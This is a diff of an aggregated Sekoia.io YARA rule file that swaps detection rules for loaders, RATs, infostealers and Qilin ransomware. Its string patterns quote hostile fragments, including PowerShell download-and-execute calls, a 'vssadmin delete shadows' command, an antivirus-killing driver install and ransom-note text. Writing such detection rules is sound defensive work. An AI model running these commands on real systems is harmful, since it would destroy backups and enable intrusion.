-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_red0044_powershell_may24.yar#L1-L26"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/killfloor_avkiller_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "73939f65b93b320b9e220ee284ea524864a6b05c7608213009ac5f00b3faeedc"
+		hash = "9f16176ac20f7855fa960d321e156d69"
+		hash = "4b019e9ed2de734e242602abce06f7c1"
+		hash = "81ae32d9de8fd21acfc61d62f3292277"
+		hash = "7cb2c4560e02c25463ec70e222ad0018"
+		logic_hash = "e89d0936612104f98b7f56dca09702f31f07868f239c2d11dd738e015e757b3a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248735,33 +248845,29 @@ rule SEKOIA_Loader_Win_Red0044_Powershell_May24 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Start-Job -ScriptBlock" ascii
-		$str02 = "Get-WmiObject" ascii
-		$str03 = "-Class Win32_OperatingSystem" ascii
-		$str04 = "-Class AntiVirusProduct" ascii
-		$str05 = "$_.Exception.Message" ascii
-		$str06 = ".DownloadString" ascii
-		$str07 = "New-Object Net.WebClient" ascii
-		$str08 = "myUserAgentHere" ascii
-		$str09 = "GetFolderPath('Desktop'))\\document.pdf" ascii
-		$str10 = "Receive-Job -Job" ascii
-		$str11 = "Start-Process" ascii
+		$ = "sc create aswArPot.sys type=kernel binpath=%s" ascii
+		$ = "sc start aswArPot.sys" ascii
+		$ = "[*] Enumerating target processes" ascii
+		$ = "[*] Entering main loop... " ascii
+		$ = "aswArPot.pdb" ascii
+		$ = "SeConvertStringSecurityDescriptorToSecurityDescriptor" wide
 
 	condition:
-		8 of them and filesize < 20KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 6 of them
 }
-rule SEKOIA_Malware_Remcom_Strings : FILE
+
+rule SEKOIA_Infostealer_Win_Eternity : FILE
 {
 	meta:
-		description = "Detects RemCom based on strings"
+		description = "Detect the Eternity infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "7a56d55a-2f35-41ef-b7af-259baf215a62"
-		date = "2022-08-30"
+		id = "0ed8d4bd-d57f-40a8-a709-d69531d59847"
+		date = "2022-03-23"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_remcom_strings.yar#L1-L22"
+		reference = "hxxp://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.]onion/threads/62331/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_eternity.yar#L3-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a46bb87bf4722303d33707afb19c8d4f209b98a88552363363520536911469ae"
+		logic_hash = "06f0f7f51100278160f5bc4f588bb6a9d749be308f879bd5704666bf90764bf9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248769,52 +248875,55 @@ rule SEKOIA_Malware_Remcom_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "RemComSvc"
-		$ = "RemCom_stderr"
-		$ = "RemCom_stdin"
-		$ = "\\\\.\\pipe\\%s%s%d"
-		$ = "RemCom_stdout"
-		$ = "\\\\.\\pipe\\RemCom_communicaton"
+		$str0 = "Sending info to Eternity.." wide
+		$str1 = "Debug mode, dont share this stealer anywhere." wide
+		$str2 = "\\Growtopia.exe" wide
+		$str3 = "Software\\Growtopia" wide
+		$str4 = "Corrupting Growtopia.." wide
+		$str5 = "Disabling Task Manager.." wide
+		$str6 = "Deleting previous file from startup and copying new one." wide
+		$str7 = "Hiding file in Startup folder.." wide
+		$str8 = "Initializing File watcher.." wide
+		$str9 = "Decoder: Failed to delete temp login. No problem, continuing.." wide
+		$str10 = "dcd.exe" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		uint16( 0 ) == 0x5A4D and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter0" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter1" ) ) or 4 of ( $str* )
 }
 
-rule SEKOIA_Apt_Apt33_Tickler : FILE
+rule SEKOIA_Backdoor_Win_Nukesped_Andariel
 {
 	meta:
-		description = "Detects APT33 Tickler malware"
+		description = "Detect the NukeSped variant type 1 used by Andariel in October 2023"
 		author = "Sekoia.io"
-		id = "e9ecf678-350c-47d2-ab4c-522974c70a45"
-		date = "2024-08-29"
+		id = "a3601f0b-5782-4546-ac22-8a0514791f8f"
+		date = "2023-11-27"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt33_tickler.yar#L4-L19"
+		reference = "https://asec.ahnlab.com/en/59073/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_nukesped_andariel.yar#L4-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "8bd712b0a49f4fecd39d30ebd121832c"
-		hash = "3f29429fce0168748d7cc75e1478aedc"
-		logic_hash = "97b858819a1920e6dcdd1a9489754a948de8e6e39b4282e7fe4f6431617a9849"
+		logic_hash = "d6421f3d0a3059e4104cfdceebb237269592f8ace7cc8d5bd613d239e4c010f4"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( hash.md5 ( pe.rich_signature.clear_data ) == "2fe65623e6b22577516a4cd051ec3baa" or pe.imphash ( ) == "a5accd1a0d3eaf2c131bc662dd7ff8ea" )
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "4ce43c7e358e3951f4c4ebd050d570786cbb473ee353974fc7414e3d753da9f6" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "355485cbe2bec406d60a48d7d8d25c71d9ded3c508c87273d936a92b94720d9b" )
 }
-rule SEKOIA_Apt_Flightnight_Malicious_Lnk : FILE
+rule SEKOIA_Ransomware_Win_Agenda : FILE
 {
 	meta:
-		description = "Detects malicious LNK used by FlightNight"
+		description = "Finds Agenda ransomware (aka Qilin) samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "06f33ece-ac9f-4dd3-98fb-cd69305ee995"
-		date = "2024-04-02"
+		id = "b0ea8e69-8f29-452f-95f7-67ee0e545b66"
+		date = "2022-12-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_flightnight_malicious_lnk.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_agenda.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3446852709fe425b2c053ffdb9c078cf20e442ef50fe20402d3b4c9e9d8b543a"
+		logic_hash = "7e315f639c4d785639bf7ed3bd805551366b4da10a664a42bf801c54c6f7bd2d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248822,93 +248931,34 @@ rule SEKOIA_Apt_Flightnight_Malicious_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "/c start /B " wide
-		$s1 = ".exe &" wide
-		$s2 = ".pdf" wide
-		$s3 = "%CD%" wide
-
-	condition:
-		uint32be( 0 ) == 0x4c000000 and $s1 in ( @s0 .. @s2 ) and $s1 in ( @s0 .. @s0 + 100 ) and $s3
-}
-rule SEKOIA_Backdoor_Mul_Sparkrat : FILE
-{
-	meta:
-		description = "Detect SparkRAT using string found in the source code"
-		author = "Sekoia.io"
-		id = "cd818207-f8ec-41fa-abef-c29d481c7897"
-		date = "2023-01-30"
-		modified = "2024-12-19"
-		reference = "https://github.com/XZB-1248/Spark"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_mul_sparkrat.yar#L1-L59"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "377fc647e9a7ee6d5ad69370d5a2264302215401417951432f904c25e26169b9"
-		score = 75
-		quality = 55
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "2006/01/02 15:04:05" wide ascii
-		$ = "can not find secret header" wide ascii
-		$ = "${i18n|COMMON.UNKNOWN_ERROR}" wide ascii
-		$ = "/api/client/update" wide ascii
-		$ = "application/octet-stream" wide ascii
-		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
-		$ = "no IP address found" wide ascii
-		$ = "failed to read network io counters" wide ascii
-		$ = "failed to read cpu info" wide ascii
-		$ = "PING" wide ascii
-		$ = "OFFLINE" wide ascii
-		$ = "LOCK" wide ascii
-		$ = "LOGOFF" wide ascii
-		$ = "HIBERNATE" wide ascii
-		$ = "SUSPEND" wide ascii
-		$ = "RESTART" wide ascii
-		$ = "SHUTDOWN" wide ascii
-		$ = "SCREENSHOT" wide ascii
-		$ = "TERMINAL_INIT" wide ascii
-		$ = "TERMINAL_INPUT" wide ascii
-		$ = "TERMINAL_RESIZE" wide ascii
-		$ = "TERMINAL_PING" wide ascii
-		$ = "TERMINAL_KILL" wide ascii
-		$ = "FILES_LIST" wide ascii
-		$ = "FILES_FETCH" wide ascii
-		$ = "FILES_REMOVE" wide ascii
-		$ = "FILES_UPLOAD" wide ascii
-		$ = "FILE_UPLOAD_TEXT" wide ascii
-		$ = "PROCESSES_LIST" wide ascii
-		$ = "PROCESS_KILL" wide ascii
-		$ = "DESKTOP_INIT" wide ascii
-		$ = "DESKTOP_PING" wide ascii
-		$ = "DESKTOP_KILL" wide ascii
-		$ = "DESKTOP_SHOT" wide ascii
-		$ = "COMMAND_EXEC" wide ascii
-		$ = "DEVICE_UPDATE" wide ascii
-		$ = "${i18n|COMMON.INVALID_PARAMETER}" wide ascii
-		$ = "${i18n|EXPLORER.FILE_OR_DIR_NOT_EXIST}" wide ascii
-		$ = "SPARK COMMIT: " wide ascii
-		$ = "${i18n|COMMON.DISCONNECTED}" wide ascii
-		$ = "${i18n|DESKTOP.NO_DISPLAY_FOUND}" wide ascii
-		$ = "/api/bridge/push" wide ascii
-		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
+		$str00 = "\"note\": \"-- Qilin" ascii
+		$str01 = "README-RECOVER-.txt" ascii
+		$str02 = "\"file_black_list\": [" ascii
+		$str03 = "\"file_pattern_black_list\": [" ascii
+		$str04 = "Encrypted files have new extension." ascii
+		$str05 = "We have downloaded compromising and sensitive data from you system/network" ascii
+		$str06 = "Employees personal dataCVsDLSSN." ascii
+		$str07 = "ueegj65kwr3v3sjhli73gjtmfnh2uqlte3vyg2kkyqq7cja2yx2ptaad.onion" ascii
+		$str08 = "cmdvssadmin.exe delete shadows /all /quiet" ascii
+		$str09 = "[WARNING] Removing shadows failed." ascii
+		$str10 = "[INFO] Shadow copies removed" ascii
+		$str11 = "[WARNING] net sahre enum failed with:" ascii
 
 	condition:
-		17 of them and filesize > 4MB
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SEKOIA_Tool_Swor : FILE
+rule SEKOIA_Hacktool_Defendercontrol_Strings : FILE
 {
 	meta:
-		description = "Detects swor"
+		description = "Detects DefenderControl based on strings"
 		author = "Sekoia.io"
-		id = "75ce2ed7-2972-4e04-98dc-451acf80c842"
-		date = "2024-09-09"
+		id = "c6587a46-5f9b-4bf0-9231-9d2505293557"
+		date = "2022-03-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_swor.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_defendercontrol_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "d3f92b3349109fc6de26f5e40800fec15308c27fa4fe81fe42af5030637a3a63"
-		logic_hash = "bcd1c0afece740b82b606aad8bdebcc88b72ae61df6513318215a217021efab4"
+		logic_hash = "8372ab6f922471c28b528d908527f52d393cf6e6308d6acad882d6d5862df43c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248916,54 +248966,47 @@ rule SEKOIA_Tool_Swor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$old_sword_s1 = "Failed to open payload file: "
-		$old_sword_s2 = "Failed to open config file: "
-		$sword_s1 = "open encrypted file error: "
-		$sword_s2 = "open config file error: "
-		$enum_calendar = "EnumCalendarInfo"
+		$ = "www.sordum.org All Rights Reserved." wide
+		$ = "dControl.exe" wide
+		$ = "By BlueLife" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and $enum_calendar and ( 2 of ( $old_sword_s* ) or 2 of ( $sword_s* ) ) and filesize < 1MB and true
+		uint16be( 0 ) == 0x4d5a and filesize < 600KB and all of them
 }
-rule SEKOIA_Loader_Win_Jinxloader_Strings : FILE
+
+rule SEKOIA_Loader_Win_Jennlog
 {
 	meta:
-		description = "Finds JinxLoader samples based on the specific strings"
+		description = "Jennlog loader used to deliver the Apostle ransomware"
 		author = "Sekoia.io"
-		id = "fd2f7e8c-f4a8-4452-bbc6-e03790f8ed89"
-		date = "2023-12-04"
+		id = "a69088e5-207f-494f-876b-766b8050e8c2"
+		date = "2021-10-04"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_jinxloader_strings.yar#L1-L20"
+		reference = "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_jennlog.yar#L4-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "816cb6019cba1aa2e229ab476fcdf378348981920cbe17d3dfb875f8b2dcbf81"
+		logic_hash = "0ffcd1f35570b28a1bd6f9a0361f8f921942f7345dcb2896fc092bb92f7d4d6d"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$str01 = "JinxV2" ascii
-		$str02 = "main.main.func1" ascii
-		$str03 = "go.shape.struct" ascii
-		$str04 = ".glob..func" ascii
-
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #str04 > 100 and filesize > 8MB
+		pe.timestamp== 3140259112 or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4c4577276ff0323d9aedcc39ecf2c964" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "8476a7fca587f1e5d3ae076293b9fbcccbebc4bd4f7b783228ad5da39305a3d9" )
 }
-rule SEKOIA_Apt_Gamaredon_Ddrdoh_Powershell_Backdoor : FILE
+rule SEKOIA_Tool_Iodine_Strings : FILE
 {
 	meta:
-		description = "Detects GAMAREDON's DDRDOH PowerShell Backdoor"
+		description = "Detects iodine based on strings"
 		author = "Sekoia.io"
-		id = "3413dedd-e3ec-4231-8af7-c7f709ab82d7"
-		date = "2023-01-23"
+		id = "029766cc-80fb-423d-adc5-8867c438c5d3"
+		date = "2024-02-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_ddrdoh_powershell_backdoor.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_iodine_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "32d088affb65d410b2715fde28227792ea9f406e324de4a2e204e9850f0b81ce"
+		logic_hash = "049b5af42d204061bd7e0c0294bb0abea492647dce8ec63fa3f296d1a19cb246"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248971,27 +249014,27 @@ rule SEKOIA_Apt_Gamaredon_Ddrdoh_Powershell_Backdoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "hidden iex $env:" ascii wide
-		$ = ".substring(0,4) -eq \"http" ascii wide
-		$ = ".split('!')[1];" ascii wide
-		$ = " -bxor $key[$i % $key.Length]" ascii wide
-		$s = "Filter $fil | Select-Object VolumeSerialNumber" ascii wide
+		$ = "Sending DNS queries for %s to %s"
+		$ = "No tun devices found, trying utun"
+		$ = "iodine IP over DNS tunneling client"
+		$ = "topdomain is the FQDN that is delegated to the tunnel endpoint."
 
 	condition:
-		uint8( 0 ) == 0x24 and 4 of them and filesize < 10KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Hacktool_Stowaway_Strings : FILE
+rule SEKOIA_Tool_Inswor_Strings : FILE
 {
 	meta:
-		description = "Detects Stowaway based on strings"
+		description = "Detects In-Swor based on strings"
 		author = "Sekoia.io"
-		id = "a952b45a-269b-4075-bf72-16d6d863e97c"
-		date = "2023-11-15"
+		id = "99aaad33-510a-41b9-9022-800588c18d6d"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_stowaway_strings.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_inswor_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "10d28637e47d43497923a192c9e3a8bb35b480a314c71132866bdf0e49c2c460"
+		hash = "c393128a143b2a3397100b4a30c75112"
+		logic_hash = "b25072e6a9fa5728c24c91056a221778f5fbc9d8ba7a78a6684cd6755761373e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248999,32 +249042,28 @@ rule SEKOIA_Hacktool_Stowaway_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "agent.CloseLowConn"
-		$ = "agent.CloseListener"
-		$ = "agent.SimpleNodeInit"
-		$ = "agent.HandleConnToLowerNode"
-		$ = "agent.HandleConnFromLowerNode"
-		$ = "common.NewPassToLowerNodeData"
-		$ = "agent.HandleSimpleNodeConn"
-		$ = "agent.HandleConnToUpperNode"
-		$ = "agent.HandleConnFromUpperNode"
-		$ = "agent.StartSocks"
+		$ = "open encrypted file error:" ascii
+		$ = "open config file error:" ascii
+		$ = "payload.ini" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_1 : FILE
+
+rule SEKOIA_Loader_Win_Abcloader : FILE
 {
 	meta:
-		description = "UAC-0154 Infection chain"
+		description = "Detect ABCloader"
 		author = "Sekoia.io"
-		id = "428eb021-b37f-4db5-8cab-ca2f6dd2e202"
-		date = "2023-10-02"
+		id = "c286ce75-a041-478e-a567-4bf1d5e66c01"
+		date = "2024-08-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0154_powershell_infection_chain_1.yar#L1-L18"
+		reference = "https://nsfocusglobal.com/new-apt-group-actor240524-a-closer-look-at-its-cyber-tactics-against-azerbaijan-and-israel/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_abcloader.yar#L4-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a849c397e7f61e41ea7e67a265717d7d66f6af42f3d1e930020d1433dd3aab18"
+		hash = "0d1dca5eaad49c2dbd979e1bf0b5f8d0"
+		hash = "9a640889e82407b06c546fea15be668f"
+		logic_hash = "64d171d31c2f03ac18dde61d5b57fba91448045404b0ff619fb8cd437a561b1f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249032,62 +249071,51 @@ rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "command $es ="
-		$ = "function isV"
-		$ = "doIn;"
-		$ = "System.IO.Comp"
+		$ = "qSii.LI4"
+		$ = "Cabinet.dll"
 
 	condition:
-		all of them and filesize < 100KB
+		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "45c6b272631aa9e0c4b2ba675699b803" or hash.md5 ( pe.rich_signature.clear_data ) == "b33158757dc039859e272f4528e10e80"
 }
-rule SEKOIA_Infostealer_Win_Agrat : FILE
+rule SEKOIA_Koi_Powershell_Loading_Obfuscatednet
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Powershell script loading obfuscated .NET Koi module"
 		author = "Sekoia.io"
-		id = "472effe8-5044-4ca1-88e0-3e19d445b9d1"
-		date = "2022-06-01"
+		id = "75a7460d-cc28-470e-9841-da8e46ee0101"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_agrat.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koi_powershell_loading_obfuscatednet.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5b02880dbc75d9e4d95ec55c8e8630a47198ee4cc25e3ff79c93e9fe634fadca"
+		logic_hash = "82f30c04474ea77af5169771a2c0e75ba792fd32dc559b8c29172b73ace4ef10"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "Vault.txt" wide
-		$str01 = "Credman.txt" wide
-		$str02 = "[Networks] {0}" wide
-		$str03 = "[Screenshot] {0}" wide
-		$str04 = "[Twitch] {0}" wide
-		$str05 = "Servers.txt" wide
-		$str06 = "[WindscribeVPN] {0}" wide
-		$str07 = "[{0}] Thread finished!" wide
-		$str08 = "[ERROR] Unable to enumerate vaults. Error (0x" wide
-		$str09 = "snowflake-ssh" wide
-		$str10 = "//setting[@name='Password']/value" wide
-		$str11 = "MakeScreenshot" ascii
-		$sys = "System.Collections.Generic.IEnumerator<Stealer." ascii
+		$s1 = "# [Net.ServicePointManager]::SecurityProtocol +='tls12'"
+		$s2 = "$binary[$i] = $binary[$i] -bxor $k[$i % $k.Length]"
+		$s3 = "\").Split('|')"
+		$s4 = "$ep.Invoke($null, "
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #sys > 10
+		$s3 and 3 of them
 }
-rule SEKOIA_Apt_Oilrig_Maliciousdocument_May2022 : FILE
+rule SEKOIA_Implant_Win_Flagpro : FILE
 {
 	meta:
-		description = "Detects OilRig Malicious Document"
+		description = "Detect the Flagpro malware used by Blacktech"
 		author = "Sekoia.io"
-		id = "cb4ab310-e24c-4edc-8804-0c49c30124fb"
-		date = "2022-05-13"
+		id = "08dd2de4-b359-424f-af04-7f294d519363"
+		date = "2022-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_maliciousdocument_may2022.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_flagpro.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d4aa960d4471ddf66ec6f98a5c883177763771ba9960b749509311a05384d9a7"
+		logic_hash = "eb1aba9924af474d6d890572a9bf72e0d1aa5dc31dd4cc34648195b0207ab4d6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249095,33 +249123,32 @@ rule SEKOIA_Apt_Oilrig_Maliciousdocument_May2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<LogonType>InteractiveToken</LogonType>"
-		$s2 = "Select * From Win32_PingStatus Where Address"
-		$s3 = "She@et1"
-		$s4 = "_VBA_PROJECT" wide
-		$s5 = "This program cannot be run in DOS mode." base64
-		$s6 = ".Agent.pdb" base64
-		$s7 = "GetAgentID" base64
+		$ = "<BODY ID=CV20_LoaderDlg BGCOLOR=LIGHTGREY style=\"font-family:MS Shell Dlg;font-size:8\">" ascii
+		$ = "<TABLE WIDTH=100% HEIGHT=100%>" ascii
+		$ = "<TR WIDTH=100% HEIGHT=45%>" ascii
+		$ = "<TD ALIGN=CENTER VALIGN=BOTTOM>" ascii
+		$ = "TODO: Place controls here." ascii
+		$ = "<TD ALIGN=RIGHT VALIGN=BOTTOM>" ascii
+		$ = "<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonHelp\">Help</BUTTON>&nbsp;&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonOK\">OK</BUTTON>&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonCancel\">Cancel</BUTTON>" ascii
+		$about_loader = /About V[0-9]+\.[0-9]+_Loader.../ wide
+		$path = "f:\\dd\\vctools\\vc7libs\\ship\\atlmfc\\include\\" wide
+		$regitry = "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\" wide
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and 3 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Tool_Execit_Obfuscator_Strings : FILE
+rule SEKOIA_Infostealer_Win_Xehook_Str : FILE
 {
 	meta:
-		description = "Detects ExecIT Dlls"
+		description = "Finds XehookStealer standalone samples based on specific strings."
 		author = "Sekoia.io"
-		id = "59eaeb20-150b-41a4-b866-1c91a07623ac"
-		date = "2024-09-11"
+		id = "fa76988d-f0a2-4fc2-a122-c104fd585f34"
+		date = "2024-06-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_execit_obfuscator_strings.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_xehook_str.yar#L1-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "1c185e2e11d8eadccfb130766ca30d85"
-		hash = "a0898f57f2b139ea278d8a7e97bbe358"
-		hash = "e0e12a8891f5585ce1ad55dbffb4f9c2"
-		hash = "d4102676d536bacffcf6c94364e26828"
-		logic_hash = "cd8edbe9c6cb7dcde56860e0ff47f4496b36848f46a89f6945b7762f86ff5e59"
+		logic_hash = "543ec3b523e5f00d3c285e453c8d11f3d5c7778b2986b7fe03f2d62ff18c2778"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249129,31 +249156,39 @@ rule SEKOIA_Tool_Execit_Obfuscator_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "yromeMlautriVetacollAtN"
-		$ = "xEdaerhTetaerCtN"
-		$ = "tcejbOelgniSroFtiaWtN"
-		$ = "lld.esablenrek"
-		$ = "txetnoCdaerhTteG"
-		$ = "txetnoCdaerhTteS"
-		$ = "cef_api_hash"
-		$ = "cef_execute_process"
-		$ = "cef_get_path"
+		$str01 = "xehook" ascii
+		$str02 = "Classes.LogRecord" ascii
